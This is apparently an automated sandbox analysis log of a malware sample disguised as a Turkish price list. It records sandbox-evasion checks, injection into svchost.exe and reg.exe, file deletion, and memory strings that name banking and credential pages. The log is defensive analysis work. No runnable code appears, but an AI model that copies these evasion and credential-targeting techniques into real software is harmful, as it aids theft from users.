                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00417ED3 push edi; ret 2_2_00417EDF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004016E2 push esp; iretd 2_2_004016E3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00401697 pushfd ; ret 2_2_004016D5
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00415F6B push edx; ret 2_2_00415F6C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A309AD push ecx; mov dword ptr [esp], ecx2_2_03A309B6
                Source: C:\Windows\SysWOW64\reg.exeCode function: 4_2_0346225F pushad ; ret 4_2_034627F9
                Source: C:\Windows\SysWOW64\reg.exeCode function: 4_2_034627FA pushad ; ret 4_2_034627F9
                Source: C:\Windows\SysWOW64\reg.exeCode function: 4_2_034909AD push ecx; mov dword ptr [esp], ecx4_2_034909B6
                Source: C:\Windows\SysWOW64\reg.exeCode function: 4_2_0346283D push eax; iretd 4_2_03462858
                Source: C:\Windows\SysWOW64\reg.exeCode function: 4_2_0346135E push eax; iretd 4_2_03461369
                Source: C:\Windows\SysWOW64\reg.exeCode function: 4_2_02C6C39F push ecx; ret 4_2_02C6C3A0
                Source: C:\Windows\SysWOW64\reg.exeCode function: 4_2_02C6C097 push ebx; ret 4_2_02C6C0A3
                Source: C:\Windows\SysWOW64\reg.exeCode function: 4_2_02C64AF0 push edi; ret 4_2_02C64AFC
                Source: C:\Windows\SysWOW64\reg.exeCode function: 4_2_02C5EA38 push ds; ret 4_2_02C5EA40
                Source: C:\Windows\SysWOW64\reg.exeCode function: 4_2_02C62860 push esp; ret 4_2_02C629C0
                Source: C:\Windows\SysWOW64\reg.exeCode function: 4_2_02C61625 push ss; retf 4_2_02C6162B
                Source: C:\Windows\SysWOW64\reg.exeCode function: 4_2_02C5779B push esi; iretd 4_2_02C577AA
                Source: C:\Users\user\Desktop\F#U0130YAT #U0130STE#U011e#U0130 L#U0130STE.exeCode function: 0_2_001948D7 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_001948D7
                Source: C:\Users\user\Desktop\F#U0130YAT #U0130STE#U011e#U0130 L#U0130STE.exeCode function: 0_2_00215376 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,0_2_00215376
                Source: C:\Users\user\Desktop\F#U0130YAT #U0130STE#U011e#U0130 L#U0130STE.exeCode function: 0_2_001B3187 EncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_001B3187
                Source: C:\Users\user\Desktop\F#U0130YAT #U0130STE#U011e#U0130 L#U0130STE.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\reg.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

                Malware Analysis System Evasion

                Source: C:\Users\user\Desktop\F#U0130YAT #U0130STE#U011e#U0130 L#U0130STE.exeAPI/Special instruction interceptor: Address: 10A1FF4
                Source: C:\Windows\SysWOW64\reg.exeAPI/Special instruction interceptor: Address: 7FFD3122D324
                Source: C:\Windows\SysWOW64\reg.exeAPI/Special instruction interceptor: Address: 7FFD3122D7E4
                Source: C:\Windows\SysWOW64\reg.exeAPI/Special instruction interceptor: Address: 7FFD3122D944
                Source: C:\Windows\SysWOW64\reg.exeAPI/Special instruction interceptor: Address: 7FFD3122D504
                Source: C:\Windows\SysWOW64\reg.exeAPI/Special instruction interceptor: Address: 7FFD3122D544
                Source: C:\Windows\SysWOW64\reg.exeAPI/Special instruction interceptor: Address: 7FFD3122D1E4
                Source: C:\Windows\SysWOW64\reg.exeAPI/Special instruction interceptor: Address: 7FFD31230154
                Source: C:\Windows\SysWOW64\reg.exeAPI/Special instruction interceptor: Address: 7FFD3122DA44
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A7096E rdtsc 2_2_03A7096E
                Source: C:\Windows\SysWOW64\reg.exeWindow / User API: threadDelayed 9799
                Source: C:\Users\user\Desktop\F#U0130YAT #U0130STE#U011e#U0130 L#U0130STE.exeAPI coverage: 4.4 %
                Source: C:\Windows\SysWOW64\svchost.exeAPI coverage: 0.7 %
                Source: C:\Windows\SysWOW64\reg.exeAPI coverage: 2.7 %
                Source: C:\Windows\SysWOW64\reg.exe TID: 7252 Thread sleep count: 173 > 30
                Source: C:\Windows\SysWOW64\reg.exe TID: 7252 Thread sleep time: -346000s >= -30000s
                Source: C:\Windows\SysWOW64\reg.exe TID: 7252 Thread sleep count: 9799 > 30
                Source: C:\Windows\SysWOW64\reg.exe TID: 7252 Thread sleep time: -19598000s >= -30000s
                Source: C:\Program Files (x86)\GCXkjJfnLpqeNWrbCBnxfNSIvuGNdmaLjBbQFrtCdlTp\uD8F5JGUDvEpNoCYQYtn.exe TID: 7392 Thread sleep time: -80000s >= -30000s
                Source: C:\Program Files (x86)\GCXkjJfnLpqeNWrbCBnxfNSIvuGNdmaLjBbQFrtCdlTp\uD8F5JGUDvEpNoCYQYtn.exe TID: 7392 Thread sleep count: 44 > 30
                Source: C:\Program Files (x86)\GCXkjJfnLpqeNWrbCBnxfNSIvuGNdmaLjBbQFrtCdlTp\uD8F5JGUDvEpNoCYQYtn.exe TID: 7392 Thread sleep time: -66000s >= -30000s
                Source: C:\Program Files (x86)\GCXkjJfnLpqeNWrbCBnxfNSIvuGNdmaLjBbQFrtCdlTp\uD8F5JGUDvEpNoCYQYtn.exe TID: 7392 Thread sleep count: 42 > 30
                Source: C:\Program Files (x86)\GCXkjJfnLpqeNWrbCBnxfNSIvuGNdmaLjBbQFrtCdlTp\uD8F5JGUDvEpNoCYQYtn.exe TID: 7392 Thread sleep time: -42000s >= -30000s
                Source: C:\Windows\SysWOW64\reg.exeLast function: Thread delayed
                Source: C:\Users\user\Desktop\F#U0130YAT #U0130STE#U011e#U0130 L#U0130STE.exeCode function: 0_2_001F445A GetFileAttributesW,FindFirstFileW,FindClose,0_2_001F445A
                Source: C:\Users\user\Desktop\F#U0130YAT #U0130STE#U011e#U0130 L#U0130STE.exeCode function: 0_2_001FC6D1 FindFirstFileW,FindClose,0_2_001FC6D1
                Source: C:\Users\user\Desktop\F#U0130YAT #U0130STE#U011e#U0130 L#U0130STE.exeCode function: 0_2_001FC75C FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_001FC75C
                Source: C:\Users\user\Desktop\F#U0130YAT #U0130STE#U011e#U0130 L#U0130STE.exeCode function: 0_2_001FEF95 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_001FEF95
                Source: C:\Users\user\Desktop\F#U0130YAT #U0130STE#U011e#U0130 L#U0130STE.exeCode function: 0_2_001FF0F2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_001FF0F2
                Source: C:\Users\user\Desktop\F#U0130YAT #U0130STE#U011e#U0130 L#U0130STE.exeCode function: 0_2_001FF3F3 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_001FF3F3
                Source: C:\Users\user\Desktop\F#U0130YAT #U0130STE#U011e#U0130 L#U0130STE.exeCode function: 0_2_001F37EF FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_001F37EF
                Source: C:\Users\user\Desktop\F#U0130YAT #U0130STE#U011e#U0130 L#U0130STE.exeCode function: 0_2_001F3B12 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_001F3B12
                Source: C:\Users\user\Desktop\F#U0130YAT #U0130STE#U011e#U0130 L#U0130STE.exeCode function: 0_2_001FBCBC FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_001FBCBC
                Source: C:\Windows\SysWOW64\reg.exeCode function: 4_2_02C6C640 FindFirstFileW,FindNextFileW,FindClose,4_2_02C6C640
                Source: C:\Users\user\Desktop\F#U0130YAT #U0130STE#U011e#U0130 L#U0130STE.exeCode function: 0_2_001949A0 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_001949A0
                Source: r44a7072.4.drBinary or memory string: Interactive userers - NDCDYNVMware20,11696501413z
                Source: r44a7072.4.drBinary or memory string: tasks.office.comVMware20,11696501413o
                Source: r44a7072.4.drBinary or memory string: trackpan.utiitsl.comVMware20,11696501413h
                Source: r44a7072.4.drBinary or memory string: netportal.hdfcbank.comVMware20,11696501413
                Source: r44a7072.4.drBinary or memory string: www.interactiveuserers.co.inVMware20,11696501413~
                Source: r44a7072.4.drBinary or memory string: dev.azure.comVMware20,11696501413j
                Source: r44a7072.4.drBinary or memory string: Interactive userers - COM.HKVMware20,11696501413
                Source: r44a7072.4.drBinary or memory string: Test URL for global passwords blocklistVMware20,11696501413
                Source: r44a7072.4.drBinary or memory string: secure.bankofamerica.comVMware20,11696501413|UE
                Source: r44a7072.4.drBinary or memory string: bankofamerica.comVMware20,11696501413x
                Source: r44a7072.4.drBinary or memory string: Canara Transaction PasswordVMware20,11696501413}
                Source: r44a7072.4.drBinary or memory string: Interactive userers - non-EU EuropeVMware20,11696501413
                Source: r44a7072.4.drBinary or memory string: Canara Transaction PasswordVMware20,11696501413x
                Source: r44a7072.4.drBinary or memory string: turbotax.intuit.comVMware20,11696501413t
                Source: reg.exe, 00000004.00000002.3579738318.0000000002FFE000.00000004.00000020.00020000.00000000.sdmp, uD8F5JGUDvEpNoCYQYtn.exe, 0000000D.00000002.3580869515.00000000016D9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                Source: r44a7072.4.drBinary or memory string: Interactive userers - HKVMware20,11696501413]
                Source: r44a7072.4.drBinary or memory string: outlook.office.comVMware20,11696501413s
                Source: r44a7072.4.drBinary or memory string: Interactive userers - EU East & CentralVMware20,11696501413
                Source: firefox.exe, 0000000E.00000002.1572199418.00000125F4DAC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll7
                Source: r44a7072.4.drBinary or memory string: account.microsoft.com/profileVMware20,11696501413u
                Source: r44a7072.4.drBinary or memory string: Interactive userers - GDCDYNVMware20,11696501413p
                Source: r44a7072.4.drBinary or memory string: Interactive userers - EU WestVMware20,11696501413n
                Source: r44a7072.4.drBinary or memory string: ms.portal.azure.comVMware20,11696501413
                Source: r44a7072.4.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696501413
                Source: r44a7072.4.drBinary or memory string: www.interactiveuserers.comVMware20,11696501413}
                Source: r44a7072.4.drBinary or memory string: interactiveuserers.co.inVMware20,11696501413d
                Source: r44a7072.4.drBinary or memory string: microsoft.visualstudio.comVMware20,11696501413x
                Source: r44a7072.4.drBinary or memory string: global block list test formVMware20,11696501413
                Source: r44a7072.4.drBinary or memory string: outlook.office365.comVMware20,11696501413t
                Source: r44a7072.4.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696501413^
                Source: r44a7072.4.drBinary or memory string: interactiveuserers.comVMware20,11696501413
                Source: r44a7072.4.drBinary or memory string: discord.comVMware20,11696501413f
                Source: r44a7072.4.drBinary or memory string: AMC password management pageVMware20,11696501413
                Source: C:\Users\user\Desktop\F#U0130YAT #U0130STE#U011e#U0130 L#U0130STE.exeAPI call chain: ExitProcess graph end nodegraph_0-101097
                Source: C:\Windows\SysWOW64\svchost.exeProcess information queried: ProcessInformation
                Source: C:\Windows\SysWOW64\svchost.exeProcess queried: DebugPort
                Source: C:\Windows\SysWOW64\reg.exeProcess queried: DebugPort
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A7096E rdtsc 2_2_03A7096E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00417973 LdrLoadDll,2_2_00417973
                Source: C:\Users\user\Desktop\F#U0130YAT #U0130STE#U011e#U0130 L#U0130STE.exeCode function: 0_2_00203F09 BlockInput,0_2_00203F09
                Source: C:\Users\user\Desktop\F#U0130YAT #U0130STE#U011e#U0130 L#U0130STE.exeCode function: 0_2_00193B3A GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,0_2_00193B3A
                Source: C:\Users\user\Desktop\F#U0130YAT #U0130STE#U011e#U0130 L#U0130STE.exeCode function: 0_2_001C5A7C EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,0_2_001C5A7C
                Source: C:\Users\user\Desktop\F#U0130YAT #U0130STE#U011e#U0130 L#U0130STE.exeCode function: 0_2_00194B37 LoadLibraryA,GetProcAddress,0_2_00194B37
                Source: C:\Users\user\Desktop\F#U0130YAT #U0130STE#U011e#U0130 L#U0130STE.exeCode function: 0_2_010A2260 mov eax, dword ptr fs:[00000030h]0_2_010A2260
                Source: C:\Users\user\Desktop\F#U0130YAT #U0130STE#U011e#U0130 L#U0130STE.exeCode function: 0_2_010A22C0 mov eax, dword ptr fs:[00000030h]0_2_010A22C0
                Source: C:\Users\user\Desktop\F#U0130YAT #U0130STE#U011e#U0130 L#U0130STE.exeCode function: 0_2_010A0C50 mov eax, dword ptr fs:[00000030h]0_2_010A0C50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A2E388 mov eax, dword ptr fs:[00000030h]2_2_03A2E388
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A5438F mov eax, dword ptr fs:[00000030h]2_2_03A5438F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A28397 mov eax, dword ptr fs:[00000030h]2_2_03A28397
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A403E9 mov eax, dword ptr fs:[00000030h]2_2_03A403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A4E3F0 mov eax, dword ptr fs:[00000030h]2_2_03A4E3F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A663FF mov eax, dword ptr fs:[00000030h]2_2_03A663FF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AEC3CD mov eax, dword ptr fs:[00000030h]2_2_03AEC3CD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A3A3C0 mov eax, dword ptr fs:[00000030h]2_2_03A3A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A383C0 mov eax, dword ptr fs:[00000030h]2_2_03A383C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB63C0 mov eax, dword ptr fs:[00000030h]2_2_03AB63C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03ADE3DB mov eax, dword ptr fs:[00000030h]2_2_03ADE3DB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03ADE3DB mov ecx, dword ptr fs:[00000030h]2_2_03ADE3DB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AD43D4 mov eax, dword ptr fs:[00000030h]2_2_03AD43D4
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A6A30B mov eax, dword ptr fs:[00000030h]2_2_03A6A30B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A2C310 mov ecx, dword ptr fs:[00000030h]2_2_03A2C310
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A50310 mov ecx, dword ptr fs:[00000030h]2_2_03A50310
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AD437C mov eax, dword ptr fs:[00000030h]2_2_03AD437C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB2349 mov eax, dword ptr fs:[00000030h]2_2_03AB2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB035C mov eax, dword ptr fs:[00000030h]2_2_03AB035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB035C mov ecx, dword ptr fs:[00000030h]2_2_03AB035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AFA352 mov eax, dword ptr fs:[00000030h]2_2_03AFA352
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AD8350 mov ecx, dword ptr fs:[00000030h]2_2_03AD8350
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A402A0 mov eax, dword ptr fs:[00000030h]2_2_03A402A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AC62A0 mov eax, dword ptr fs:[00000030h]2_2_03AC62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AC62A0 mov ecx, dword ptr fs:[00000030h]2_2_03AC62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A6E284 mov eax, dword ptr fs:[00000030h]2_2_03A6E284
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB0283 mov eax, dword ptr fs:[00000030h]2_2_03AB0283
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A402E1 mov eax, dword ptr fs:[00000030h]2_2_03A402E1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A3A2C3 mov eax, dword ptr fs:[00000030h]2_2_03A3A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A2823B mov eax, dword ptr fs:[00000030h]2_2_03A2823B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A34260 mov eax, dword ptr fs:[00000030h]2_2_03A34260
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A34260 mov eax, dword ptr fs:[00000030h]2_2_03A34260
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A34260 mov eax, dword ptr fs:[00000030h]2_2_03A34260
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A2826B mov eax, dword ptr fs:[00000030h]2_2_03A2826B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AE0274 mov eax, dword ptr fs:[00000030h]2_2_03AE0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AE0274 mov eax, dword ptr fs:[00000030h]2_2_03AE0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AE0274 mov eax, dword ptr fs:[00000030h]2_2_03AE0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AE0274 mov eax, dword ptr fs:[00000030h]2_2_03AE0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AE0274 mov eax, dword ptr fs:[00000030h]2_2_03AE0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AE0274 mov eax, dword ptr fs:[00000030h]2_2_03AE0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AE0274 mov eax, dword ptr fs:[00000030h]2_2_03AE0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AE0274 mov eax, dword ptr fs:[00000030h]2_2_03AE0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AE0274 mov eax, dword ptr fs:[00000030h]2_2_03AE0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AE0274 mov eax, dword ptr fs:[00000030h]2_2_03AE0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AE0274 mov eax, dword ptr fs:[00000030h]2_2_03AE0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AE0274 mov eax, dword ptr fs:[00000030h]2_2_03AE0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB8243 mov eax, dword ptr fs:[00000030h]2_2_03AB8243
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB8243 mov ecx, dword ptr fs:[00000030h]2_2_03AB8243
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A2A250 mov eax, dword ptr fs:[00000030h]2_2_03A2A250
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A36259 mov eax, dword ptr fs:[00000030h]2_2_03A36259
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AEA250 mov eax, dword ptr fs:[00000030h]2_2_03AEA250
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AEA250 mov eax, dword ptr fs:[00000030h]2_2_03AEA250
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A70185 mov eax, dword ptr fs:[00000030h]2_2_03A70185
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AEC188 mov eax, dword ptr fs:[00000030h]2_2_03AEC188
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AEC188 mov eax, dword ptr fs:[00000030h]2_2_03AEC188
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AD4180 mov eax, dword ptr fs:[00000030h]2_2_03AD4180
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AD4180 mov eax, dword ptr fs:[00000030h]2_2_03AD4180
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB019F mov eax, dword ptr fs:[00000030h]2_2_03AB019F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB019F mov eax, dword ptr fs:[00000030h]2_2_03AB019F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB019F mov eax, dword ptr fs:[00000030h]2_2_03AB019F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB019F mov eax, dword ptr fs:[00000030h]2_2_03AB019F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A2A197 mov eax, dword ptr fs:[00000030h]2_2_03A2A197
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A2A197 mov eax, dword ptr fs:[00000030h]2_2_03A2A197
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A2A197 mov eax, dword ptr fs:[00000030h]2_2_03A2A197
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B061E5 mov eax, dword ptr fs:[00000030h]2_2_03B061E5
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A601F8 mov eax, dword ptr fs:[00000030h]2_2_03A601F8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AF61C3 mov eax, dword ptr fs:[00000030h]2_2_03AF61C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AF61C3 mov eax, dword ptr fs:[00000030h]2_2_03AF61C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AAE1D0 mov eax, dword ptr fs:[00000030h]2_2_03AAE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AAE1D0 mov eax, dword ptr fs:[00000030h]2_2_03AAE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AAE1D0 mov ecx, dword ptr fs:[00000030h]2_2_03AAE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AAE1D0 mov eax, dword ptr fs:[00000030h]2_2_03AAE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AAE1D0 mov eax, dword ptr fs:[00000030h]2_2_03AAE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A60124 mov eax, dword ptr fs:[00000030h]2_2_03A60124
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03ADE10E mov eax, dword ptr fs:[00000030h]2_2_03ADE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03ADE10E mov ecx, dword ptr fs:[00000030h]2_2_03ADE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03ADE10E mov eax, dword ptr fs:[00000030h]2_2_03ADE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03ADE10E mov eax, dword ptr fs:[00000030h]2_2_03ADE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03ADE10E mov ecx, dword ptr fs:[00000030h]2_2_03ADE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03ADE10E mov eax, dword ptr fs:[00000030h]2_2_03ADE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03ADE10E mov eax, dword ptr fs:[00000030h]2_2_03ADE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03ADE10E mov ecx, dword ptr fs:[00000030h]2_2_03ADE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03ADE10E mov eax, dword ptr fs:[00000030h]2_2_03ADE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03ADE10E mov ecx, dword ptr fs:[00000030h]2_2_03ADE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03ADA118 mov ecx, dword ptr fs:[00000030h]2_2_03ADA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03ADA118 mov eax, dword ptr fs:[00000030h]2_2_03ADA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03ADA118 mov eax, dword ptr fs:[00000030h]2_2_03ADA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03ADA118 mov eax, dword ptr fs:[00000030h]2_2_03ADA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AF0115 mov eax, dword ptr fs:[00000030h]2_2_03AF0115
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AC4144 mov eax, dword ptr fs:[00000030h]2_2_03AC4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AC4144 mov eax, dword ptr fs:[00000030h]2_2_03AC4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AC4144 mov ecx, dword ptr fs:[00000030h]2_2_03AC4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AC4144 mov eax, dword ptr fs:[00000030h]2_2_03AC4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AC4144 mov eax, dword ptr fs:[00000030h]2_2_03AC4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A2C156 mov eax, dword ptr fs:[00000030h]2_2_03A2C156
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AC8158 mov eax, dword ptr fs:[00000030h]2_2_03AC8158
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A36154 mov eax, dword ptr fs:[00000030h]2_2_03A36154
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A36154 mov eax, dword ptr fs:[00000030h]2_2_03A36154
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AC80A8 mov eax, dword ptr fs:[00000030h]2_2_03AC80A8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AF60B8 mov eax, dword ptr fs:[00000030h]2_2_03AF60B8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AF60B8 mov ecx, dword ptr fs:[00000030h]2_2_03AF60B8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A3208A mov eax, dword ptr fs:[00000030h]2_2_03A3208A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A2A0E3 mov ecx, dword ptr fs:[00000030h]2_2_03A2A0E3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A380E9 mov eax, dword ptr fs:[00000030h]2_2_03A380E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB60E0 mov eax, dword ptr fs:[00000030h]2_2_03AB60E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A2C0F0 mov eax, dword ptr fs:[00000030h]2_2_03A2C0F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A720F0 mov ecx, dword ptr fs:[00000030h]2_2_03A720F0
